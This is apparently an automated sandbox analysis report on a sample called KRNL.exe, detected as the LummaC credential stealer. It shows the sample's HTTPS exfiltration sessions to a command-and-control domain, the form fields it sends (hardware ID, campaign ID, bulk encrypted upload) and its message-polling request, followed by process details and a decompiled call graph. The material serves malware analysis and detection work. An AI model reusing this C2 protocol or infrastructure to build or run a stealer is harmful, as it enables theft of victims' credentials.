                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jMFKhikIgbTsQ1nVpnLxrtBclkRvBmedYN04YIWzh0Q88uDz6kw5BZNlLOxvaDm%2F3CiQhPbF5UKfne8O3i0KBkvMMJH3w48XJQW8nzsjspuxlTSPGfrUZur2qYvKxZ6cJJk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        CF-RAY: 8fb540f31a4f434f-EWR
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1689&rtt_var=646&sent=9&recv=26&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21395&delivery_rate=1679125&cwnd=209&unsent_bytes=0&cid=60b842939b6d8e33&ts=613&x=0"
                                                                                                                                                                                                                                                        2025-01-01 20:28:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                        2025-01-01 20:28:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49739 | 172.67.157.254 | 443 | 2120 | C:\Users\user\Desktop\KRNL.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-01 20:28:06 UTC | 271 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=1XSU0JOGY
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1199
    Host: lev-tolstoi.com
2025-01-01 20:28:06 UTC | 1199 | OUT | Data Raw: 2d 2d 31 58 53 55 30 4a 4f 47 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 42 44 32 35 31 32 33 38 44 43 35 33 31 46 31 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 31 58 53 55 30 4a 4f 47 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 58 53 55 30 4a 4f 47 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 39 39 31 32 35 33 35 0d 0a 2d 2d 31 58 53 55 30 4a 4f 47 59 0d 0a 43 6f 6e 74 65 6e 74 2d
    Data Ascii: --1XSU0JOGYContent-Disposition: form-data; name="hwid"3BD251238DC531F1BCFD68B774EF9B7A--1XSU0JOGYContent-Disposition: form-data; name="pid"1--1XSU0JOGYContent-Disposition: form-data; name="lid"yau6Na--629912535--1XSU0JOGYContent-
2025-01-01 20:28:07 UTC | 1128 | IN | HTTP/1.1 200 OK
    Date: Wed, 01 Jan 2025 20:28:07 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=34e1gv937kancuc1vrf0aa8u9b; expires=Sun, 27 Apr 2025 14:14:45 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DBnlfgtv53alXFrKO5PUmok0PNQpqHD8%2FS93X3MdZHdesPV7f8eXxyvV%2B7Hlf4NToX25IT4pIqclWi%2F1SapIZmYAx2M%2FBSRgZye6pGmHDf63YSI99kn%2FShyRmxvitExeyuE%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fb540fc18234322-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2222&min_rtt=2215&rtt_var=845&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2106&delivery_rate=1284080&cwnd=221&unsent_bytes=0&cid=b95c1bcad473c732&ts=749&x=0"
2025-01-01 20:28:07 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-01 20:28:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49740 | 172.67.157.254 | 443 | 2120 | C:\Users\user\Desktop\KRNL.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-01 20:28:08 UTC | 282 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=7HO70WUPW0KCDJFRF2
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 568307
    Host: lev-tolstoi.com
2025-01-01 20:28:08 UTC | 15331 | OUT | Data Raw: 2d 2d 37 48 4f 37 30 57 55 50 57 30 4b 43 44 4a 46 52 46 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 42 44 32 35 31 32 33 38 44 43 35 33 31 46 31 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 37 48 4f 37 30 57 55 50 57 30 4b 43 44 4a 46 52 46 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 48 4f 37 30 57 55 50 57 30 4b 43 44 4a 46 52 46 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 39 39 31
    Data Ascii: --7HO70WUPW0KCDJFRF2Content-Disposition: form-data; name="hwid"3BD251238DC531F1BCFD68B774EF9B7A--7HO70WUPW0KCDJFRF2Content-Disposition: form-data; name="pid"1--7HO70WUPW0KCDJFRF2Content-Disposition: form-data; name="lid"yau6Na--62991
2025-01-01 20:28:08 UTC | 15331 | OUT | Data Raw: 28 c6 d7 d9 c7 e3 4f c3 0f 15 f5 bc ec f2 fd d5 57 ec 3e d3 11 5f 81 01 29 e6 04 c0 b7 c1 b3 98 87 df d8 79 94 6f 36 e2 f0 37 58 9c 71 f9 ff 8c 00 f2 90 0a 3c f2 db 10 dc 0f e2 0c a9 b9 7e 80 99 cb 07 4e c3 01 91 21 38 ee 51 d9 5a 07 bf 99 fd 98 0d c5 90 95 62 5e 94 2f 7d 76 2d e5 77 de 54 cb 08 04 ed e5 db 73 d6 fa 40 6b db 25 ef e7 71 5e cf ab 45 3c 3d 70 84 36 f1 e6 68 8d 06 2e c7 bd 26 59 2d ff f2 0f fc 40 98 24 ba f5 3e 85 b9 c8 9e f9 f2 d7 b6 76 2c a5 3c 4e c1 3c ef 1b ee 8c 66 7a a3 8f 32 e8 7c 42 0f 7c af 5c ab 24 12 c6 36 73 de 5d 1a b4 6a da c9 ef 41 53 4e 86 98 a4 2c 5f 6d 5f fc 5b 0c 47 24 a8 de 44 2c 4c 48 dc d6 8c 1e 35 95 cb ea 0f 43 e4 4d 2e 5f 07 db 9c ef 96 f6 5f e5 ab fb f8 73 40 d2 d2 08 73 e2 b4 f3 ae 27 a9 a8 ff 50 6c 5d 85 d2 b5 16
    Data Ascii: (OW>_)yo67Xq<~N!8QZb^/}v-wTs@k%q^E<=p6h.&Y-@$>v,<N<fz2|B|\$6s]jASN,_m_[G$D,LH5CM.__s@s'Pl]
2025-01-01 20:28:08 UTC | 15331 | OUT | Data Raw: aa 2a 77 8f 7e 56 3c 2e a3 e9 b2 69 fc 51 1b 1b 78 b9 b0 3b 38 09 1f ec 25 5a ee f0 95 5e ff d5 ff fa 5b 9b 2a f7 88 9a 9a 42 49 30 54 1c 62 0a 31 66 73 f1 60 db 8e 7f b5 58 6a 5d 04 62 90 fe 3b 72 7d fe 25 48 9a f9 ef 10 eb dc 6c 0d 6f 40 23 21 01 c4 29 f2 ff 35 68 5a aa bf 4f d4 04 22 e0 30 86 77 72 cf ee 3e 20 bd 9f a6 8a c0 f1 f5 eb fb 64 1b 65 92 a1 ea d5 9d 75 fd 72 95 52 60 b1 f1 06 e4 2b fa 2c fd b8 9a 68 fb 47 f4 95 ec fb bc 3d 7f 01 45 30 ae 9e f0 f3 f8 9f b6 82 c8 3a e4 40 8b b7 fe 20 48 c1 65 c6 f8 f4 28 44 0b 47 07 c0 c7 16 54 8a 38 f2 eb ba 1a 9e b8 ab 06 4c c2 6e c2 03 4e 10 11 7c 98 8a 78 4d 2a d0 f2 c8 dd db a0 b3 25 7f 8a 54 3c 5f bb 86 2f 35 49 ef 49 45 8c 94 90 b9 4c 58 09 d8 3b c0 22 26 ee 23 79 73 0a 98 11 48 20 7b f5 78 32 bf 7e 23
    Data Ascii: *w~V<.iQx;8%Z^[*BI0Tb1fs`Xj]b;r}%Hlo@#!)5hZO"0wr> deurR`+,hG=E0:@ He(DGT8LnN|xM*%T<_/5IIELX;"&#ysH {x2~#
2025-01-01 20:28:08 UTC | 15331 | OUT | Data Raw: a2 99 20 10 bd fb 3f 1f bc 97 65 7f ae 6c ff 58 59 f1 b2 26 13 89 43 84 5b e8 db c7 c9 37 72 d3 00 5d 8d 48 a5 a1 c9 fc 28 5e 25 e0 81 c5 ae 1f d3 b0 54 c1 3b e5 98 60 c1 53 28 1c 71 80 6b 78 70 10 e7 51 a2 f2 62 96 fd d0 e4 23 0f ec 3c f9 f6 cd eb 3f 74 dd 2c e7 87 d0 23 9d 17 e7 00 f1 0a 44 54 18 ca 47 01 d7 b6 82 27 4f e0 52 50 af ff df a9 b5 36 17 ac d5 db f7 eb 0d da 76 e1 fa f5 58 e4 9d d9 6a 5f 5e b3 e2 53 6e d5 5e 18 2f de 15 f9 85 e2 2c 51 3f 4b af 86 80 44 1c e4 36 b9 77 dd 8a 27 40 1e 38 7f 9f 23 45 d4 e0 86 e2 4a 51 bb f2 76 e9 61 bf 4b 08 bc 46 d3 3b 05 c8 ba 2c f5 15 21 8b 5a 52 aa 28 4e 04 bc 11 55 b7 04 99 0d 21 ae 80 30 54 30 37 2c 27 36 52 ad f5 8c a1 2f a4 fe 4f c4 8b 43 a4 16 80 59 44 b3 e3 f4 50 3b c1 c1 c5 9f ee e9 e8 f5 03 fb 77 6f
    Data Ascii: ?elXY&C[7r]H(^%T;`S(qkxpQb#<?t,#DTG'ORP6vXj_^Sn^/,Q?KD6w'@8#EJQvaKF;,!ZR(NU!0T07,'6R/OCYDP;wo
2025-01-01 20:28:08 UTC | 15331 | OUT | Data Raw: 58 04 dc 89 f4 12 0d 4d 6e 52 66 32 62 1a 59 25 0f 5c e6 cb 2f 3d 90 e0 14 82 fa 47 30 11 df 3c 22 84 32 ae e0 00 0e 81 67 af 04 66 f5 b9 15 81 40 68 23 b4 90 e1 0f 83 fa a1 91 91 81 70 98 df ba 46 2f 3f c3 a2 a9 31 90 6e 4e fb 7d 82 6c 7a f4 78 78 46 84 76 05 57 c5 1b a1 b0 fa 56 c9 9a 6c 15 70 66 52 1e 22 ba f1 2d 0f 20 f1 88 40 e9 5b be 26 fe 1a 86 6d 91 9a 6b 95 3e 37 49 13 cd 07 24 85 27 9c 8c f5 b9 53 98 33 93 17 f7 af e7 0e a9 63 86 03 1f 0d 0e 07 1f 5b 50 ee 2e 62 b4 6a 8b d9 69 4b 35 2f 04 33 ae 1d 27 8b ad bf d6 b4 1d 96 6f 5d 94 b4 af 0f d3 10 6d 2b e7 84 71 53 04 05 46 82 30 20 18 03 63 6c 83 fe 5d 02 f4 91 05 23 31 60 1b 4d ab 3a 57 ec 14 83 09 47 a4 5b 84 e8 7b d9 35 53 3f 09 8d 4b 15 bc ce 79 1b 8f b6 3f 2f c0 5c 15 3e 68 17 aa ea b7 65 14
    Data Ascii: XMnRf2bY%\/=G0<"2gf@h#pF/?1nN}lzxxFvWVlpfR"- @[&mk>7I$'S3c[P.bjiK5/3'o]m+qSF0 cl]#1`M:WG[{5S?Ky?/\>he
2025-01-01 20:28:08 UTC | 15331 | OUT | Data Raw: 51 2f 2d 02 25 c7 e2 2e 83 ab a3 89 a8 56 d2 c5 d3 93 59 1a 78 68 2e 66 dc 3a b7 2e 82 e7 12 96 c2 d6 ba 40 37 87 90 f0 8c e4 c7 57 e2 7d 91 54 03 04 d6 48 c5 af 5b 86 cc af 2e eb 16 8c 21 25 10 a1 da cf 27 40 0c f7 74 41 26 e9 3c 8c 7c be 0b 07 bb 3c aa 07 cc 54 7c 64 79 bb c9 41 d2 39 c0 7e 3f 5b 9c b5 04 52 db 28 15 6b 81 b3 e0 34 98 72 57 14 03 9a 57 4c a9 3b 60 63 50 2b b3 72 e0 81 f2 dd cd 01 5d 0c 11 55 a1 26 e3 9e d7 8b 30 d9 94 31 d6 ad b2 b3 40 fe 0f 0a 98 93 36 ad 69 23 05 ed bb 8e f0 a0 cd 41 09 95 10 6d c2 d0 1c 07 0c e3 e1 16 24 b0 7c 04 77 89 82 dd 65 cb c2 f4 76 e3 5e 71 50 b6 79 7b 6f 00 0a 68 b0 9f 68 22 2a 0b b5 8a 08 d1 73 3a 25 19 50 df c1 f1 62 55 70 9a e1 fe 61 63 fd b0 e3 e0 46 d3 87 94 c3 e3 ec 47 95 29 2a ca d4 2c 83 3f 0a 7d 47
    Data Ascii: Q/-%.VYxh.f:.@7W}TH[.!%'@tA&<|<T|dyA9~?[R(k4rWWL;`cP+r]U&01@6i#Am$|wev^qPy{ohh"*s:%PbUpacFG)*,?}G
2025-01-01 20:28:08 UTC | 15331 | OUT | Data Raw: d2 c0 37 bd da 12 b6 24 b5 1e 10 e4 78 21 0a 7e 2e 8e 96 83 aa 35 7a 9b 25 15 b7 33 bd 69 b1 45 16 7e 34 e1 02 53 da b0 4d 11 dc 41 49 70 68 ee 21 20 dd 9c 9a b6 7b fa d6 e5 ba e3 8a 32 e5 8d ba 1a a0 9b 27 08 bf f3 18 3d 8d a6 bf dd 18 b5 cc ed ef 1d e3 ff 6e 0b 7d 51 27 5c e7 0c 91 19 59 01 fc f7 cc 0d fb 91 a4 45 7e be 8f 30 7d de 3a 7c 4f c1 10 f7 2f 1c ef b8 2e 60 c7 28 23 7e 42 7c aa 57 90 6d 0b d8 df 65 89 40 a3 23 77 0f 89 9f 71 98 2b cd ea 52 43 d5 50 5a a0 3e 79 70 e8 23 2e e9 a0 97 a1 76 8f 62 9f 63 d9 8e d0 33 b2 a4 be 09 5c 7a 9d 6e e7 57 ce 50 f9 c1 48 a4 e5 18 a6 ea 01 e9 39 eb a7 d5 95 06 d2 34 2e 7f bb c6 f0 08 92 49 a2 b0 c2 3d 10 da 4d 54 08 45 44 81 13 83 62 b7 ee 5a 8c 1f 15 39 24 7e 74 f5 d9 7c 43 a8 02 c9 ab 49 bb c4 84 c2 0b 0d 5d
    Data Ascii: 7$x!~.5z%3iE~4SMAIph! {2'=n}Q'\YE~0}:|O/.`(#~B|Wme@#wq+RCPZ>yp#.vbc3\znWPH94.I=MTEDbZ9$~t|CI]
2025-01-01 20:28:08 UTC | 15331 | OUT | Data Raw: 54 66 98 2b 2e b5 5f d0 d3 57 51 54 b9 af fc 0c 69 83 ec 33 18 8e 91 d1 ed 3f 11 46 af 75 7d 64 b6 93 41 14 00 e5 a5 e3 e5 e5 06 5e 71 00 1f bc a0 5d 1f 2e ed e8 c7 99 ca b8 0c 08 fd 7e c1 e9 6e c6 9f 75 db eb da 8d 8a d7 33 54 b8 32 e7 48 fa 5b f6 96 8b 5a 57 69 dc e0 0f c1 a2 5b ad 5c be 73 6c ed 98 39 24 25 b3 52 65 d3 9e 9d 3e 69 eb 7d 15 e8 d3 d2 8f 66 b4 86 e6 d3 d4 b9 09 c1 bb d2 a7 6c e0 38 f8 6f 4a ff b7 9e c1 9b 86 80 50 00 f5 e0 25 8d 6d 38 c2 c1 ce df d6 c6 3f d0 b3 83 36 5e 17 04 6d 8d 9d e4 54 31 0f ee 20 1f cb ef 62 73 7a 8d 05 62 94 32 07 df cb 01 ad 23 b4 eb 9f d3 72 15 5b 6e 07 68 3f 0e ff 7c c7 f8 96 16 98 2e 89 6a 40 54 7a 9f 38 12 84 89 b2 16 00 b7 50 68 de a5 53 ce 84 49 d1 61 57 29 99 5d 75 f9 5e dd 52 7f 93 3c a5 c6 04 4d ca 30 90
    Data Ascii: Tf+._WQTi3?Fu}dA^q].~nu3T2H[ZWi[\sl9$%Re>i}fl8oJP%m8?6^mT1 bszb2#r[nh?|.j@Tz8PhSIaW)]u^R<M0
2025-01-01 20:28:08 UTC | 15331 | OUT | Data Raw: 46 c0 17 56 b3 00 7e de 52 81 a6 aa 8b 80 d8 67 7d 01 4f 45 94 ba 54 20 34 f6 bc 63 d5 cb e2 0e 1b c2 f5 2d c4 3d 07 b9 63 be a0 5e 9d d1 b7 10 b3 1e 06 d3 e0 d0 0b 8b e1 2a 7d f0 61 d9 96 09 2a 15 3b eb 4f 43 85 e1 20 49 d4 f9 d5 4a 9d 23 61 32 5b a3 81 65 03 dc 1a dd 91 44 42 47 1b e2 52 6f a1 1f df 45 21 90 d4 66 d2 78 7b dd d8 a9 29 30 55 66 4f 31 ca ec 9e 85 f0 86 c4 ea 5e e9 77 05 44 2f 51 61 2d ab be b0 a8 b0 49 dc 3b f3 36 cc 11 37 ad 2b 98 f3 50 ec e2 15 97 08 63 5e 95 7e 37 4b 2f d3 d1 5c 82 3f b7 1f 46 78 4c 27 c7 33 ba eb 37 6b f7 4e f0 1c bb 62 2a 8c 0a a5 ae cf 0c d1 77 c3 4a b3 bc 3a a5 d8 b2 f4 69 37 ed 0c 80 a3 c2 cc d6 bc e1 eb 7a 13 d9 01 f1 9b 56 ba ed d9 0c 29 ce 55 03 ea b5 36 42 57 0f db e3 28 56 57 e1 b2 aa 1e b8 a4 5d 98 36 98 ac
    Data Ascii: FV~Rg}OET 4c-=c^*}a*;OC IJ#a2[eDBGRoE!fx{)0UfO1^wD/Qa-I;67+Pc^~7K/\?FxL'37kNb*wJ:i7zV)U6BW(VW]6
2025-01-01 20:28:08 UTC | 15331 | OUT | Data Raw: a8 f5 57 73 eb ed f9 80 8e 68 c1 37 c6 cb 83 23 72 e0 9d 8c 1e 12 3c ed 13 4d 37 0f f9 b1 dd b2 3f d9 e4 ea d6 8f 67 c2 1a e0 e4 ba 9d 3a ff 67 80 e3 6a 25 2c 11 57 c8 0b 74 d6 6e 7b dd ba eb 7c 94 fa 03 89 f6 ab bd f5 2e 49 0e fc 96 3b a5 8b 7b 5e 27 0e e1 b8 2a 01 55 d2 37 3f aa 24 bc c5 10 6d 6b 50 d8 41 e5 dd e8 63 7b 8d 60 47 48 b6 0a 1c ae bf 9e 16 e6 a6 d2 b8 db 84 f7 f4 e8 bb 4e 7c 5e d4 50 cc fc 55 b3 b4 0e f1 5b 44 a1 cf 0e d4 ae e4 d0 81 3b 72 1b f6 d7 d6 3e 8a e0 b9 2f e8 a2 34 8c e1 21 41 25 c5 04 cb 6c c1 d7 47 b5 3e 45 bf d9 64 1f 29 f6 80 b2 9d bc d4 a5 bd a8 14 17 ec dc 78 b1 f0 5d e7 e6 48 5e 16 86 e3 66 26 3d 8d 81 70 73 ae cd d8 f1 b5 b7 35 d1 47 b0 fa ad dc 4e 27 03 c5 b5 da 38 52 15 1f 3e 31 58 43 af 4d 6c 8e 46 18 36 f9 9b 45 f0 ae
                                                                                                                                                                                                                                                        Data Ascii: Wsh7#r<M7?g:gj%,Wtn{|.I;{^'*U7?$mkPAc{`GHN|^PU[D;r>/4!A%lG>Ed)x]H^f&=ps5GN'8R>1XCMlF6E
2025-01-01 20:28:12 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Wed, 01 Jan 2025 20:28:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ap3nd5k78kiqthj9nfi8ja9t9s; expires=Sun, 27 Apr 2025 14:14:48 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fsojRMVTTYhHW14VlRUMa8EPNmI%2FBBf6Zyu0d9lPmkaOnjmayeqDqeeLHEBYbWt1EjwnGsW8cQA9%2FJafpzhaNoB2iqGJSLEpPSBHB0uzsxgzf75%2FqVlrv3prtg4W3W5ekOQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fb54106fcabf797-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1528&min_rtt=1486&rtt_var=587&sent=210&recv=587&lost=0&retrans=0&sent_bytes=2834&recv_bytes=570853&delivery_rate=1965006&cwnd=162&unsent_bytes=0&cid=51364f500c4f09a9&ts=4739&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49741 | 172.67.157.254 | 443 | 2120 | C:\Users\user\Desktop\KRNL.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-01 20:28:13 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 86
Host: lev-tolstoi.com
2025-01-01 20:28:13 UTC | 86 | OUT | Data Ascii: act=get_message&ver=4.0&lid=yau6Na--629912535&j=&hwid=3BD251238DC531F1BCFD68B774EF9B7A
2025-01-01 20:28:13 UTC | 1119 | IN | HTTP/1.1 200 OK
Date: Wed, 01 Jan 2025 20:28:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=5b78ormml84dsg09s4qbrmgcg5; expires=Sun, 27 Apr 2025 14:14:52 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hD1de9pApDRO1aGXsRh8egqNOFAo6Zb9kpuosgRT3ZnbRY142d0P1TV8TcRcJHCqs9pnZ7z4pNZmvoNQfefs3fWkXURA%2BuIyl2Wwd2EHmdzF87a4VwY9b1ygxHLjUJhCFUo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fb541279f7e41af-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1692&rtt_var=649&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=985&delivery_rate=1666666&cwnd=224&unsent_bytes=0&cid=29d532e9b94a0294&ts=483&x=0"



Target ID:0
Start time:15:27:56
Start date:01/01/2025
Path:C:\Users\user\Desktop\KRNL.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\KRNL.exe"
Imagebase:0x6e0000
File size:567'848 bytes
MD5 hash:976A25D2FED5FC7C8700588A33C6826C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:1
Start time:15:27:56
Start date:01/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:2
Start time:15:27:56
Start date:01/01/2025
Path:C:\Users\user\Desktop\KRNL.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\KRNL.exe"
Imagebase:0x6e0000
File size:567'848 bytes
MD5 hash:976A25D2FED5FC7C8700588A33C6826C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1751845531.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:false


Execution Graph

Execution Coverage:6.5%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:5.8%
Total number of Nodes:2000
Total number of Limit Nodes:26
20503->20505 20504 6fdda0 20504->20505 20506 6fdda5 GetACP 20504->20506 20505->20366 20507 6fbf11 20505->20507 20506->20505 20508 6fbf4f 20507->20508 20509 6fbf1f __Getctype 20507->20509 20511 6f76e4 __strnicoll 14 API calls 20508->20511 20509->20508 20510 6fbf3a RtlAllocateHeap 20509->20510 20513 6f5877 std::ios_base::_Init 2 API calls 20509->20513 20510->20509 20512 6fbf4d 20510->20512 20511->20512 20512->20369 20512->20370 20513->20509 20515 6fdd6d 41 API calls 20514->20515 20516 6fdb88 20515->20516 20517 6fdc8d 20516->20517 20519 6fdbc5 IsValidCodePage 20516->20519 20524 6fdbe0 __fread_nolock 20516->20524 20518 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 20517->20518 20520 6fdd6b 20518->20520 20519->20517 20521 6fdbd7 20519->20521 20520->20374 20520->20377 20522 6fdc00 GetCPInfo 20521->20522 20521->20524 20522->20517 20522->20524 20573 6fe0f7 20524->20573 20526 6fe2a8 ___scrt_is_nonwritable_in_current_image 20525->20526 20653 6f80e1 EnterCriticalSection 20526->20653 20528 6fe2b2 20654 6fe036 20528->20654 20534 6f2998 20533->20534 20535 6f2991 20533->20535 20534->20535 20536 6fc16a __Getctype 39 API calls 20534->20536 20535->20503 20535->20504 20537 6f29b9 20536->20537 20541 6fc74e 20537->20541 20542 6fc761 20541->20542 20544 6f29cf 20541->20544 20542->20544 20549 7008a5 20542->20549 20545 6fc77b 20544->20545 20546 6fc78e 20545->20546 20547 6fc7a3 20545->20547 20546->20547 20570 6fdb02 20546->20570 20547->20535 20550 7008b1 ___scrt_is_nonwritable_in_current_image 20549->20550 20551 6fc16a __Getctype 39 API calls 20550->20551 20552 7008ba 20551->20552 20559 700900 20552->20559 20562 6f80e1 EnterCriticalSection 20552->20562 20554 7008d8 20563 700926 20554->20563 20559->20544 20560 6f8353 CallUnexpected 39 API calls 20561 700925 20560->20561 20562->20554 20564 700934 __Getctype 20563->20564 20566 7008e9 20563->20566 20565 7006da __Getctype 14 API calls 20564->20565 20564->20566 20565->20566 20567 700905 20566->20567 20568 6f80f8 
